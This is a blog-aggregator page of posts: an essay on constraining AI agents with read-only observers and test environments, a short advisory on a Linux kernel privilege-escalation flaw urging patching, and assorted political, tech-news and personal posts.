On the model side, we’re still trying to prompt‑engineer our way into reliability. That’s cute for prototypes but reckless for systems you depend on.

We spent 20 years perfecting CI/CD for deterministic code—version control, reproducible builds, test harnesses, staging, blue‑green deploys—all so we could ship well informed. Meanwhile, we vibe‑check stochastic agents into production with a handful of prompts and a cherry‑picked demo.

A more sensible default is to treat the environment definition—the code and configuration that specify the world the model lives in—as the unit of deployment. Libraries like Verifiers make this concrete by packaging environments for LLMs with tools, datasets, parsing logic, rewards, and rollout policies in one place.

To make that definition precise, you need four anchors:

  • State schema: The shape of the world the environment exposes to the model at each step (fields, types, invariants)
  • Action interface: The tools or functions the model is allowed to call, with their inputs and outputs
  • Reward spec: The checks you run to score behavior (correct/incorrect, passed/failed, right tool, right schema)
  • Rollout policy: How you exercise the environment (single‑turn versus multi‑turn, maximum steps, termination conditions)

You’re not “deploying state” in the sense of a frozen snapshot of production. You’re deploying the rules of the game: what the model can see, what it can do, how you score it, and how you run episodes. Any candidate model you plug into that environment is evaluated and constrained the same way. You then treat that environment definition like a test suite plus staging cluster, comparing models on behavior that  matters for your workflow, training smaller, specialized models using verifiable rewards instead of vibes, and detecting regressions when either models or tools change.

For enterprises, this means you don’t “deploy an LLM” with some prompts. You ship an environment package: code, config, and test data that define the world; plus metrics and logging. The model is a plug‑in you can swap or retrain based on how it behaves inside that package, not in an ad hoc prompt sandbox.

Observers, gyms, and asymmetric agents

Mirrors and gyms are both environments built around feedback loops. The difference is who’s allowed to touch reality.

  • Mirrors watch you. The AI reads broadly, writes only to its own notes, and hands you structured feedback. You learn; you act.
  • Gyms watch the model. The AI acts inside a sandbox, collects rewards, updates its weights. The model learns; the environment constrains.

Agents—the things that take actions in live systems—should sit downstream of both. They should be asymmetric by design:

  • In production, agents default to read‑only or read‑mostly. Write access is narrow, logged, reviewable, and easy to kill.
  • In training and evaluation, agents can be fully read‑write but only inside deliberately engineered environments.

Anything else is YOLO alignment: You train in production, corrupt your own telemetry, and then argue with the logs when something goes wrong.

Think of it as risk management for agents. Every new write permission expands the blast radius. If you haven’t instrumented the read path, you’re taking on unpriced risk. Gyms for them, mirrors for us, asymmetric agents at the edges—that’s a risk posture you can explain to an auditor.

Butler agents are security theater

Now add security to the mix. Simon Willison’s “lethal trifecta” of agent risk is simple: private data, untrusted inputs, and external communications. Get all three in one agent and you’ve basically handed an attacker a loaded gun.

Most “do‑everything” butler agents proudly hit the trifecta: They ingest piles of sensitive internal data, they cheerfully process whatever the internet throws at them, and they’re allowed to send emails, modify records, or call external APIs. You’ve built a hyper‑efficient exfiltration and amplification engine.

Observer AI pulls in the opposite direction. It can still see private data but uses it only to generate internal reflections or drafts. It treats untrusted inputs as something to analyze, not something to obey. And it doesn’t touch external channels; you stay in the loop.

Butler agents give executives the feeling that “AI is doing work for us” while dramatically increasing the blast radius of prompt injection, model hallucinations, or compromised keys. Observers are actual governance: They help humans see, reason, and decide before anything gets written where it counts.

In the enterprise, “agentic workflows” without observer environments are just shadow IT with better branding. If you can’t instrument and audit what the system reads, you have no business trusting what it writes.

Boots on the ground: The friction is real

This isn’t just a whiteboard problem. In big bank reality, the conversation often goes like this:

Client: “We want an AI assistant that updates customer records, sends follow‑ups, and opens tickets automatically.”

Me: “Great. Show me your observability. How do you know what it’s reading today and how those reads map to actions?”

 Client: “…we have logs?”

Say, “No, your shiny new bot should not have direct write access to the CRM,” and the first reaction is disbelief. Then come the workarounds: “What if it drafts and auto‑sends unless someone clicks reject?” “What if it only updates ‘safe’ fields?” “What if the human is technically in the loop but the default is accept?” All of them duck the hard work of building the mirror and the gym first.

In a post‑GDPR, postbreach world, an observer that doesn’t push data is a compliance gift. A write‑enabled agent is a data‑deletion nightmare and a discovery headache. We’re desperate to give agents hands before we’ve given ourselves eyes. Until you can trace the read path—what’s accessed, why, and with what downstream effect—every new write permission is architectural debt with a ticking clock.

A simple playbook

If you’re trying to bring order to this chaos, here’s a blunt playbook.

Build observers first
Aggregate your cognitive exhaust—or the org’s. Start with a read‑only layer across mail, tickets, docs, code, CRM, usage logs. Have it produce structured reflections: where work happens, where intent and action diverge, and where relationships or processes are decaying. Let it write only into its own vault.

Encode scary workflows as environments
Pick high‑risk, high‑value flows: claims adjudication, payment routing, change approval, remediation—anything with money, legal exposure, or brand risk. For each, define an environment with clear state schema, action interface, reward spec, and rollout policy. Use frameworks like Verifiers to make these reusable instead of bespoke scripts.

Treat environments as deployable artifacts
Think of an environment as a repo you can clone—not a frozen copy of production but the minimum code, configuration, and sample data needed to exercise a workflow reproducibly. You version, test, and promote that environment package the way you do services. When APIs, schemas, or policies change, you update the package and rerun the suites. You don’t “prompt harder” in production and hope.

Only then, grant narrow write access
Once mirrors and gyms are in place, start handing out tightly scoped write capabilities—one surface at a time, with metrics and rollback. And have your observers watching both human and agent behavior for drift. This is slower. It’s also professional.

Rethinking “personal” and “agentic”

Reframing AI around feedback loops does odd things to our buzzwords. “Personal AI” stops being “a bot that talks like you and acts for you” and becomes “an observability layer on your own cognition.” It’s closer to therapy than outsourcing. Therapy doesn’t send emails for you; it changes how you write them.

“Agentic AI” stops being “a thing that chains tools together” and becomes “a thing that lives inside an environment with explicit constraints and signed‑off rewards.” The swagger moves from the model to the environment. The question shifts from “How smart is your agent?” to “How well‑designed is the world you’re letting it inhabit?”

Gyms for them, mirrors for us. Agents only where the feedback loops are strong enough to justify the risk. Less demo‑friendly than a bot that spams your calendar, sure. But a lot closer to something you can live with—in your personal life, and in a production architecture that must survive contact with reality.

12:14

Copy.Fail Linux Vulnerability [Schneier on Security]

This is the worst Linux vulnerability in years.

TL;DR

  • copy.fail is a Linux kernel local privilege escalation, not a browser or clipboard attack. Disclosed by Theori on 29 April 2026 with a working PoC.
  • It abuses the kernel crypto API (AF_ALG sockets) plus splice() to write four bytes at a time straight into the page cache of a file the attacker does not own.
  • The exploit works unmodified across Ubuntu, RHEL, Debian, SUSE, Amazon Linux, Fedora and most others. No race condition, no per-distro offsets.
  • The file on disk is never modified. AIDE, Tripwire and checksum-based monitoring see nothing.
  • Kubernetes Pod Security Standards (Restricted) and the default RuntimeDefault seccomp profile do not block the syscall used. A custom seccomp profile is needed.
  • The mainline fix landed on 1 April. Distros are rolling kernels out now. Patch.

“Local privilege escalation” sounds dry, so let me unpack it. It means: an attacker who already has some way to run code on the machine, even as the most boring unprivileged user, can promote themselves to root. From there they can read every file, install backdoors, watch every process, and pivot to other systems.

Why does that matter on shared infrastructure? Because “local” covers a lot of ground in 2026: every container on a shared Kubernetes node, every tenant on a shared hosting box, every CI/CD job that runs untrusted pull-request code, every WSL2 instance on a Windows laptop, every containerised AI agent given shell access. They all share one Linux kernel with their neighbours. A kernel LPE collapses that boundary.

News article.

11:28

The Law of Unintended Consequences [Judith Proctor's Journal]

Those who  love 'The Good Place' as much as I do will probably recognise the quote.

'The Law of Unintended Consequences' says that it's not possible to live a perfect life in modern society.  Everything we do impacts negatively on the environment or involves low-paid labour, unethical working practices, etc.

But there are some things we can do.

We can't win, but we can nibble at the edges.

Shampoo

Advertisers work hard to convince us that we need to wash our hair ever single day to keep it perfect, but our ancestors didn't have shampoo.  Shampoo didn't reach the UK until the eighteenth century.

I used to suffer from regular problems with my ears.  I thought it was earwax build up, until the lady syringing my ears said it was thin slivers of skin.

I wondered what was triggering it, and considered that shampoo might be a possible cause.

 

Taking a deep breath, I began cutting out shampoo at a week long folk festival - where so many people were camping that no one would notice if I was looking a mess.

My hair got greasy, but not as badly as I'd expected.  I carried on with the experiment...

After two months of not stripping all the natural oils in my hair and scalp, my body stopped over-producing them in an effort to replace them.

Over 30 years later, I still haven't gone back to using shampoo, and my hair isn't greasy.  I wash it with water, and that's all.  Brushing distributes the oils evenly and keeps it silky, but not greasy.

Another member of my family who went the same way, briefly tried shampoo recently, and promptly got dandruff (which they'd never had before).

Not saying this will work for everyone, but you can save a LOT of money, and reduce your environmental impact as well. (detergent kills fish).   If you do go for it, cut down gradually.  Reduce the amount of shampoo you use, and reduced the frequency of washes.  If you cut down gradually, then you'll avoid the greasy phase.  Maybe use some sort of tiny measuring cup to measure the amount you use?

 

 



comment count unavailable comments

10:28

Early rejections [Seth's Blog]

Long after the fact, these are the best kind. They remind us of how far we’ve come. They’re proof that not giving up was a good idea. They are fuel for the next thing.

But, at the time, they’re pretty hard to live with.

All we can do is remind ourselves that it’s an unskippable part of a useful journey.

08:28

Pluralistic: A fascist paradigm (12 May 2026) [Pluralistic: Daily links from Cory Doctorow]

->->->->->->->->->->->->->->->->->->->->->->->->->->->->-> Top Sources: None -->

Today's links



A king on a sumptuous, much elaborated throne; in one hand he holds a sceptre of office, in the other, the leashes for two fierce stone dogs that guard the throne. The king's head has been replaced with a character who was used as the basis for MAD Magazine's Alfred E Neumann. The new head sports a conical dunce cap. Behind the king is a UK Reform Party rosette. The background is an Egyptian temple, ganked from a Dore Old Testament engraving. The floor has been carpeted in sumptuous tabriz from the Ottoman court.

A fascist paradigm (permalink)

Yesterday, I attended a workshop on systems thinking and political change, which included a presentation on the work of Donella Meadows, whose Thinking in Systems is a canonical work on the subject:

https://en.wikipedia.org/wiki/Thinking_In_Systems:_A_Primer

"Systems thinking" is an analytical framework that treats the world as a mesh of interconnected, nonlinear components and relationships that can't be easily understood or steered. A complex system isn't merely "complicated." A mechanical watch is complicated, in that it has many parts that work together in ways that require training and specialized knowledge to understand. But it isn't "complex" because each part has a specific function that can be understood and adjusted.

In a complex system – say, an ecosystem – the parts are meshed in a web of unobvious relationships that make it difficult to predict what effect will follow from a given perturbation. When a blight kills off a plant species, the soil stability declines, resulting in landslides during the rainy season, changing the mineral content of nearby waterways, which creates microbial blooms or fish die-offs in a distant, downstream lake.

A slide showing a lever weighted down on one end by a circle labeled 'System' next to a fulcrum; the points along the lever are labeled with different potential interventions that can move the system, taken from the work of Donella Meadows.

But systems thinking isn't a counsel of despair that insists that you shouldn't do anything because you can never predict what will come of your actions. In Thinking in Systems, Meadows presents a hierarchy of leverage points for changing a system, ranked from least effective ("Constants, numbers, parameters") to most ("The power to shift paradigms to deal with new challenges"):

https://www.flickr.com/photos/doctorow/55264856861/

In all, Meadows theorizes 12 different "places to intervene in a system." The least effective of these – constants like taxes and standards, negative and positive feedback loops – are the sites of most of our political fights, and rightly so. They are the fine-tuning knobs of the system that adjust its margins. Once you have the rule of law ("the rules of the system"), you can drive change by amending, repealing or passing a law:

https://donellameadows.org/archives/leverage-points-places-to-intervene-in-a-system/

But when you're confronted with a system that is significantly, persistently dysfunctional, you will likely have to work at sites that are further up the hierarchy, such as "the distribution of power over the rules of the system" or "the goals of the system"; or the most profound of all, "the paradigm out of which the system — its goals, power structure, rules, its culture — arises."

Thinking about paradigms is a form of "meta-cognition," which is to say, "thinking about how you think." Your paradigm encompasses all your assumptions, including your assumptions about how to proceed from your other assumptions: "if x, then y" is a paradigm.

The workshop where we were discussing all of this is part of a group whose goal is reversing the antidemocratic movement in our society and the climate emergency that is its backdrop. But as I listened to the speaker and the ensuing discussion, it occurred to me that Meadows' theoretical work was a very good way of describing the successes of the fascist movement in the UK and around the world.

Fascists like Farage and Trump are, at their root, anti-democratic. Their pitch is that the people are incapable of self-determination (as Peter Thiel puts it, "democracy is incompatible with freedom"). They want us to think that all our neighbors are irrational and foolish, and that we, too, are irrational and foolish, and that our safety and prosperity can only be safeguarded if we seek out those few people who are born to rule and liberate them from the petty niceties and regulations that democracy and the rule of law demand.

In other words, the paradigm of democracy is that all of us are capable of both wise self-governance and self-rationalized misgovernance, and each of us has a useful perspective to contribute. The fascist paradigm is that we can't be trusted to rule ourselves, and only the people who are born with "good blood" are capable of directing our lives:

https://pluralistic.net/2025/05/20/big-cornflakes-energy/#caliper-pilled

This is the theory behind "race realism" and "human diversity" and all the other polite names the modern fascist uses to obscure the fact that they're reviving eugenics. It explains the panic over DEI, a panic driven by the belief that lesser people are being elevated to positions of rule and authority that they are genetically incapable of carrying out.

That's why, whenever a disaster arises, fascists demand to know the gender, race and sexual orientation of the pilot, the ship's captain, or the official in charge. If the person who crashed the cargo ship into the bridge has brown skin, we can add another line to the ledger of costs associated with the doomed project to put people who were born to be bossed around in the boss's seat (of course, if the pilot turns out to be a white guy, that proves nothing, except that mistakes sometimes happen).

The revival of fascism in this century has been scarily effective, and at times it can feel unstoppable. Meadows' work on systems thinking provides an explanation for that efficacy – and suggests a theory of change for dispatching fascism back to the graveyard of history. Fascists have made changes to things like laws and feedback loops, rules and distribution of power, but this all stems from a more profound alteration to the system, at the level of the paradigm.

Which suggests that the real fight we have is over that paradigm: we have to convince our neighbors that they are smart enough to rule themselves, and so are we, and so is everyone else. We have to convince them that even the smartest and wisest person (including us, including them) is capable of folly and needs to have checks on their (our) authority.

We need to attack the theory of the "unitary executive" and every other autocratic ideology head on. We have to insist that these aren't just unconstitutional, but that they are ideologically catastrophic. "No kings," because even an omnibenevolent king isn't omniscient, and that means that omnipotence is always omnidestructive in the long run.

The fascist revival has been scarily effective and resilient – and systems thinking offers an explanation for both that efficacy and that resiliency.


Hey look at this (permalink)



A shelf of leatherbound history books with a gilt-stamped series title, 'The World's Famous Events.'

Object permanence (permalink)

#25yrsago First aid for the dying dotcom http://modernhumorist.com/mh/0010/dotcom/

#20yrsago OpenStreetMap maps Isle of Wight, Manchester next https://wiki.openstreetmap.org/wiki/Mapchester_Mapping_Party_2006

#20yrsago Fueling model rockets with Oreo fillings https://web.archive.org/web/20060616192646/https://www.popsci.com/popsci/how20/600152d7d441b010vgnvcm1000004eecbccdrcrd.html

#20yrsago Legal guide for podcasters https://wiki.creativecommons.org/wiki/Welcome_To_The_Podcasting_Legal_Guide

#20yrsago Collection of 1100+ found grocery lists https://grocerylists.org/

#10yrsago Mayor of Jackson, MS: “I believe we can pray potholes away” https://www.wjtv.com/news/jackson-mayor-tony-yarber-we-can-pray-potholes-away/

#10yrsago What’s the best way to distribute numbers on the faces of a D120? https://web.archive.org/web/20160510182023/https://www.wired.com/2016/05/mathematical-challenge-of-designing-the-worlds-most-complex-120-sided-dice/

#10yrsago Billionaire Paypal co-founder Peter Thiel will be a California Trump delegate https://web.archive.org/web/20160510155226/https://www.wired.com/2016/05/investor-peter-thiel-will-california-delegate-trump/

#10yrsago McClatchy newspapers’ CEO pleased to announce that he’s shipping IT jobs overseas https://web.archive.org/web/20160510102956/https://www.computerworld.com/article/3067304/it-careers/newspaper-chain-sending-it-jobs-overseas.html

#10yrsago Peace in Our Time: how publishers, libraries and writers could work together https://locusmag.com/feature/cory-doctorow-peace-in-our-time/

#10yrsago Too Like the Lightning: intricate worldbuilding, brilliant speculation, gripping storytelling https://memex.craphound.com/2016/05/10/too-like-the-lightning-intricate-worldbuilding-brilliant-speculation-gripping-storytelling/

#5yrsago LA traveling toward free public transit https://pluralistic.net/2021/05/10/comrade-ustr/#get-on-the-bus

#5yrsago Biden's shift on vaccine patents is a Big Deal https://pluralistic.net/2021/05/10/comrade-ustr/#vaccine-diplomacy


Upcoming appearances (permalink)

A photo of me onstage, giving a speech, pounding the podium.



A screenshot of me at my desk, doing a livecast.

Recent appearances (permalink)



A grid of my books with Will Stahle covers..

Latest books (permalink)



A cardboard book box with the Macmillan logo.

Upcoming books (permalink)

  • "The Reverse-Centaur's Guide to AI," a short book about being a better AI critic, Farrar, Straus and Giroux, June 2026 (https://us.macmillan.com/books/9780374621568/thereversecentaursguidetolifeafterai/)
  • "Enshittification, Why Everything Suddenly Got Worse and What to Do About It" (the graphic novel), Firstsecond, 2026

  • "The Post-American Internet," a geopolitical sequel of sorts to Enshittification, Farrar, Straus and Giroux, 2027

  • "Unauthorized Bread": a middle-grades graphic novel adapted from my novella about refugees, toasters and DRM, FirstSecond, April 20, 2027

  • "The Memex Method," Farrar, Straus, Giroux, 2027



Colophon (permalink)

Today's top sources:

Currently writing: "The Post-American Internet," a sequel to "Enshittification," about the better world the rest of us get to have now that Trump has torched America. Third draft completed. Submitted to editor.

  • "The Reverse Centaur's Guide to AI," a short book for Farrar, Straus and Giroux about being an effective AI critic. LEGAL REVIEW AND COPYEDIT COMPLETE.
  • "The Post-American Internet," a short book about internet policy in the age of Trumpism. PLANNING.

  • A Little Brother short story about DIY insulin PLANNING


This work – excluding any serialized fiction – is licensed under a Creative Commons Attribution 4.0 license. That means you can use it any way you like, including commercially, provided that you attribute it to me, Cory Doctorow, and include a link to pluralistic.net.

https://creativecommons.org/licenses/by/4.0/

Quotations and images are not included in this license; they are included either under a limitation or exception to copyright, or on the basis of a separate license. Please exercise caution.


How to get Pluralistic:

Blog (no ads, tracking, or data-collection):

Pluralistic.net

Newsletter (no ads, tracking, or data-collection):

https://pluralistic.net/plura-list

Mastodon (no ads, tracking, or data-collection):

https://mamot.fr/@pluralistic

Bluesky (no ads, possible tracking and data-collection):

https://bsky.app/profile/doctorow.pluralistic.net

Medium (no ads, paywalled):

https://doctorow.medium.com/

Tumblr (mass-scale, unrestricted, third-party surveillance and advertising):

https://mostlysignssomeportents.tumblr.com/tagged/pluralistic

"When life gives you SARS, you make sarsaparilla" -Joey "Accordion Guy" DeVilla

READ CAREFULLY: By reading this, you agree, on behalf of your employer, to release me from all obligations and waivers arising from any and all NON-NEGOTIATED agreements, licenses, terms-of-service, shrinkwrap, clickwrap, browsewrap, confidentiality, non-disclosure, non-compete and acceptable use policies ("BOGUS AGREEMENTS") that I have entered into with your employer, its partners, licensors, agents and assigns, in perpetuity, without prejudice to my ongoing rights and privileges. You further represent that you have the authority to release me from any BOGUS AGREEMENTS on behalf of your employer.

ISSN: 3066-764X

08:14

Kept In The Dark by Ari Ganahl [Oh Joy Sex Toy]

Kept In The Dark by Ari Ganahl

Put on your white noise headphones and dim the lights; today’s comic is all about Sensory Deprivation. Ari Ganahl steps up and quietly shows us how with today’s lovely comic. Mediative sexy deprivation… Thank you so much Ari! Bluesky Tumblr Portfolio Oh heck, June is ALMOST here; Pledge Drive Month! The month we try to […]

06:28

Richard will give a talk in Erlangen, Germany [Richard Stallman's Political Notes]

Richard Stallman will speak in Erlangen, Germany on June 16 at 16:00, at the School of Engineering of FAU.

The talk is on the moral issues of free vs nonfree software.

We suggest you bring cash.

02:35

Evolution of a Jackalogo [Nina Paley]

My dream-bike-in-progress, the Jackalope, will have a logo etched (“bead blasted”) into the titanium, on each side of the frame. I have been working on said logo for over a week. Here’s the latest iteration:

Jackalope facing Left

That is iteration #19. Here’s how it started:

First draft

And here are some iterations between 1 and 19:

Second draft Made the antlers look like bike handlebars! Text inside the animal Integrating inside text with animal curves More text/curve integration. Now it looks kinda like a digestive tract. Bug or feature?? Warped the text to follow the body curve of the Jackalope Made a left-facing version because logo needs both right- and left-facing Some preferred the text below, so I pivoted to simplifying the animal. Simplified animal outline with text inside Should the Jackalope have pointy feet?… This one has a pointy front foot and more rounded back foot Stylized rounded front foot on this one. Dead end. I decided I preferred the pre-simplified outline, but thought the cursive text might be insufficiently legible, so tried it with a more legible font. Subtle adjustment on back legs, so the “e” doesn’t touch the leg gap Nope, I preferred the cursive. Here’s #19 again. I rounded the letters a bit, and connected them like real cursive. I separated the ears and adjusted the handlebars/antlers. I made a few subtle curve adjustments to integrate the letters. Latest Jackalope logo facing Right. Some people don’t like the “J” going out its butt, but you can’t please everyone!

Share

The post Evolution of a Jackalogo appeared first on Nina Paley.

01:14

Raising the Roof [Whatever]

In the further adventures of home renovation, the back deck has been laid and now the roofing is being put up, for shade and to keep rain off the deck. It’s looking.. pretty good! There’s more to be done, obviously. But it’s coming along nicely.

— JS

00:49

In Bloom [Penny Arcade]

For the benefit of Arcadians new and old, gay and… I guess… not a hundred percent gay, somewhat less gay at any rate, our revels in Penny Arcade's ancient past continue apace. Time has passed everywhere, even inside Mork's purty pitchers he duz all them scratchin's on. I was startled by his suggestion for this strip and I suspect others may be also.

00:28

OpenBSD and slopcode: raindrop to a torrent? [OSnews]

Every single software product is dealing with the question about what to do with “AI”-generated code, but the question is particularly difficult to answer for open source operating systems like Linux distributions and the various BSDs, which often consist of a wide variety of software packages from hundreds to thousands of different developers. On top of that, they also have to ask the “AI” question for every layer of their offering, from the base install, to the official repositories, to community-run ones.

As users, we, too, are asking these same questions, wondering just how much “AI” taint we’re willing to spread across our computers. I understand the difficult position Linux distributions are in with regard to “AI”. I mean, when even the Linux kernel itself is tainted by “AI”, a no-“AI” policy is basically an empty gesture for them at this point. Personally, I find a policy of “we don’t do ‘AI’ in our work, but we don’t have control over the thousands of components we consist of” to be an entirely reasonable, if deeply unsatisfying, position to take. What else are they going to do? You can’t really be a Linux distribution without, you know, the Linux kernel, which is, as I’ve already said, utterly tainted by “AI” at this point.

Still, in the back of my mind, I always had a trump card: if all else fails, we’ll always have OpenBSD. Its project leader Theo de Raadt is deeply principled, every OpenBSD user and contributor I know hates “AI” deeply, and the project routinely sticks to their principles even when it’s difficult or inconvenient. Yes, this makes OpenBSD not the most ideal desktop operating system, but I’d rather use that than something that embraces the multitude of ethical, environmental, quality, and legal concerns regarding “AI” code completely.

Imagine my surprise, then, to discover that OpenBSD already contains slopcode in its base installation, with the project’s leaders and developers remaining oddly silent about it. My friend and OSNews regular Morgan posted this on Fedi a few days ago:

Nearly six weeks later, and the question of whether “AI” generated code in tmux — not tool-assisted bug finding, not refactoring, actual LLM-generated slop with questionable license(1) — that was consequently merged into OpenBSD base, is considered acceptable by the lead devs, remains unanswered. Despite Theo de Raadt’s concrete stance against any code of questionable license origin polluting the project — and the tmux merge was indeed questionable — it seems this is being swept under the rug. This makes me extremely uncomfortable; it’s like seeing a fox in the henhouse but the farmers are all looking the other way and no one can convince them to admit they can see it and root it out.

I really don’t know what to do being just a user; I feel like even if I tried to chime in on the mailing list I would just be ignored like the others trying to raise the alarm. I hope, as they do, that this is being discussed internally, away from the public list, and that a positive outcome is near. Maybe they are waiting for the 7.9 release before setting anything in stone.

Or maybe the “AI” disease has infected one of the last pure operating system projects we have left and there’s no going back.

↫ Morgan on Fedi

I obviously share Morgan’s concerns, and like him, I’m also afraid that opening the door to a few drops of slop in base will quickly grow into a torrent of slop as time goes by. Yes, it’s just a patch to tmux, but it’s in base, and the “base” of a BSD is almost a sacred concept, and entirely the last place where you want to see code that raises ethical, environmental, quality, and legal concerns. For all we know, this patch of slop or the next one contains a bunch of GPL code because it just so happens that’s where the ball tumbling down the developer’s pachinko machine ended up.

GPL code that would then be in the base of a BSD.

I echo the call for the OpenBSD project to address this problem, and to set clear boundaries and guidelines regarding “AI” code, so users and developers alike know what level of quality and integrity we can expect from OpenBSD and its base installation going forward.

00:21

Urgent: Block attempt to ban voting by mail [Richard Stallman's Political Notes]

US citizens: call on Congress to block the fascist's attempt to ban voting by mail.

US citizens: Join with this campaign to address this issue.

To phone your congresscritter about this, the main switchboard is +1-202-224-3121.

Please spread the word.

Urgent: Reject budget that attacks public education [Richard Stallman's Political Notes]

US citizens: call on Tell Congress: Reject the magats' budget that attacks public education.

See the instructions for how to sign this letter campaign without running any nonfree JavaScript code--not trivial, but not hard.

US citizens: Join with this campaign to address this issue.

To phone your congresscritter about this, the main switchboard is +1-202-224-3121.

Please spread the word.

Household cost of blockaded oil and gas [Richard Stallman's Political Notes]

Citing the household cost of blockaded oil and gas to remind people of the desperate need to start climate defense.

The article uses the fashionable term "toxic", saying that the topic of climate disaster and the need to prevent it has become "toxic". What does that actually mean? Why in general does a topic, cause, or person, become "toxic"?

It is usually the result of a systematic campaign of vilification which aims to associate the target with a vague criticism, for which the reasons rarely rationally reconsidered. In the case of climate defense, we know this campaign has been operating for years, funded by the fossil fuel companies and spread by the many businesses that have relations with them and the politicians that they have funded.

The word "toxic", at the concrete level, refers to the existence of such an association for that target. But its connotation puts the blame on the target. Thus, it is a weasel-word whose effect is to endorse the campaign -- in effect, to condemn climate defense for being the target of vilification by the rich.

I therefore suggest rejecting the word.

World unprepared for next pandemic [Richard Stallman's Political Notes]

*World "unprepared" for next pandemic as countries fail to agree on sharing information, tests and vaccines.*

Magat officials closed San Francisco's immigration court [Richard Stallman's Political Notes]

Magat officials have closed San Francisco's immigration court.

US immigration courts have been underfunded for years, producing a large backlog of immigration cases. The wrecker's policy is to seize on various bogus excuses (such as criticizing him for his actions and policies) to cancel people's immigration cases. As a result, delaying the resolution of those cases is advantageous for him.

Rate of side effects from Covid and Shingles vaccines [Richard Stallman's Political Notes]

US Food and Drug Administration scientists published papers on the rate of side effects from Covid and Shingles vaccines, and found that serious side effects were very rare — one in a million.

Anti-vax agency officials withdrew the papers, claiming that the conclusions are invalid.

Banned non-fiction books doubled in US [Richard Stallman's Political Notes]

*Report shows banned non-fiction books doubled over last school year in US. New PEN America report analyzed 3,743 unique titles removed from libraries and classrooms and found books about activism and social movements were targeted.*

Mexico city sinking up to 40cm per year [Richard Stallman's Political Notes]

Mexico city is pumping so much water out of the aquifer underneath it that it is sinking up to 40cm per year.

When pipes leak under Mexico City, where does the water go? Into the aquifer? If so, leakage is just a way of extracting less. But I can't be sure of that — that water may take years to reach the aquifer than where it is needed. And engineers would compensate by increasing the extraction rate.

With enough money, solar-powered desalination could provide water for Mexico City, and pipelines could bring it there. But this would require taxing the rich.

Australian PISSI wives returning to Australia [Richard Stallman's Political Notes]

Australia has allowed some Australians who became PISSI wives, and were imprisoned for years in Syria, to return to Australia.

Some of them face grave criminal charges for supporting PISSI, and they deserve that. But exiling people is an unjust punishment for any crime, and punishing them without a trial is unjust too.

Radical listening [Richard Stallman's Political Notes]

Radical listening — a way of drawing passersby into exploring political issues together.

China trying to eradicate Tibetan culture [Richard Stallman's Political Notes]

China is trying to eradicate Tibetan culture and language by teaching children to speak only Chinese.

This reminds me of the residential schools that the US and Canada forced Amerindian children to live in during much of the 20th century — likewise designed to erase their cultures and languages.

The US and Canada ceased that practice some decades ago; now China is taking it up.

Political issues worth writing about [Richard Stallman's Political Notes]

Ralph Nader describes several political issues that would be worth writing about, but reporters disregard his requests that they do so.

With regard to trying yet again to remove the monster from office, we know that it can't be done with the current composition of Congress. He was impeached twice during his first term, the second time after the January 6 attack on the Capitol, and Senate Republicans protected him both times. They would surely do it again; their attachment to him takes precedence over their country.

Besides, he now has another monster, less deranged but no less cruel and un-American, standing by to replace him.

However, as Nader suggests, the attempt might be an effective basis for organizing to save the Constitution by defeating SCROTUS in November. And our ex-presidents do have a duty to help.

Customers block from donating to the SPLC [Richard Stallman's Political Notes]

Big financial companies such as Fidelity and Vanguard have arbitrarily blocked customers from donating to the SPLC from their donor-advised funds.

I wonder if they can move these funds to other companies that aren't lackeys of persecution.

Punishing network for political reasons [Richard Stallman's Political Notes]

*ABC lawyers accuse [the] FCC [in court] of punishing network for political reasons.*

It is not news that the FCC is doing that, but ABC's willingness to resist is rare and admirable.

Directions for US and Iran negotiations [Richard Stallman's Political Notes]

Proposing directions for negotiation between the US and Iran that might lead to a deal.

It seems to be that the biggest obstacle is how to assure Iran that the US will actually keep a deal. Remove the bullshitter from office, perhaps?

Monday, 11 May

23:42

Page 12 [Flipside]

Page 12 is done.

22:56

Windows 11 will start boosting your processor to maximum GHz to make the Start menu open faster [OSnews]

Microsoft is currently testing a brand new performance-enhancing feature in Windows 11.

Microsoft, too, is introducing something to Windows 11 called “low latency profile” and it this will work irrespective of the processor, be it AMD64 CPUs like Intel or AMD or ARM64 ones like from Qualcomm. Essentially what this new tech will do is apply a maximum available clock frequency boost for a very small span of time, like for one to three seconds, when a user launches any app. The idea is that the app launch time will reduce while the quick clock burst should not impact the overall efficiency of the system by much.

↫ Sayan Sen at Neowin

Unsurprisingly, boosting the processor’s clock speed to its maximum for a few seconds will make a menu or application open a little faster. I’m not entirely sure why anyone seems surprised by this, but here we are. Yes, the Start menu will load faster and applications will be ready quicker if you boost the processor to its full potential, but that does raise the question of why Windows 11 would need to do that just to open a menu or load an application in the first place.

According to Microsoft’s Scott Henselmann, who defended Microsoft’s approach (weirdly enough he did so on a nazi platform called “Twitter” that I’m obviously not linking to), every other modern operating system does the exact same thing, pointing specifically to macOS and GNOME and KDE on Linux. He also pointed out that the Start menu today does a lot more than the same Start menu back in Windows 95, including making network requests and rendering everything in HiDPI.

I just want a cascading menu of stuff I can run and don’t want my launcher to make network requests, but alas, I guess I’m old.

Anyway, I don’t know enough about the intricacies of how modern processors work to make any statements about how this affects battery life, but instinctively, you’d think this would not exactly be conducive to that. I also wonder if this will trigger a lot of laptops to spin up their fans whenever you open the Start menu, because the few seconds your processor goes full tilt raises its temperature just enough to make that happen. Once this new feature comes out of testing and is generally available, I’d be quite interested in seeing battery tests, as well comparisons to other operating systems to see how it fares.

22:07

GitHub is sinking [OSnews]

Microsoft acquired GitHub and applied their unique brand of enshittification. Amongst their achievements was the spawning of the Copilot circle of hell. Now they’re effectively DDoSing themselves with slop. I won’t dwell on what else went wrong. I don’t know and I don’t care. GitHub is impressively bad now. It’s embarrassing. Shameful.

↫ David Bushell

Luckily, there’s really very little in the form of lock-in with GitHub, unless you really value your stars or whatever. There are countless alternatives, and if you’re a programmer, it’s probably absolutely trivial for you to run your own instance of any of the various available forges. If you’re still on GitHub, you should really be thinking about, and planning for, leaving, as it seems it’s circling the drain.

21:21

19:00

17:28

Additional notes on controlling which handles are inherited by Create­Process [The Old New Thing]

Some time ago, I wrote about programmatically controlling which handles are inherited by new processes in Win32 by using the PROC_THREAD_ATTRIBUTE_HANDLE_LIST to limit exactly which handles are inherited. That way, when you create a new process, you have precise control over which handles get inherited and don’t accidentally inherit handles created by unrelated components in your process.

A collegue of mine pointed out that you still have the reverse problem: Since handles must be marked as inheritable for them to participate in PROC_THREAD_ATTRIBUTE_HANDLE_LIST, if another thread calls Create­Process with bInheritHandles = TRUE but without using PROC_THREAD_ATTRIBUTE_HANDLE_LIST, then they will accidentally inherit all of your handles.

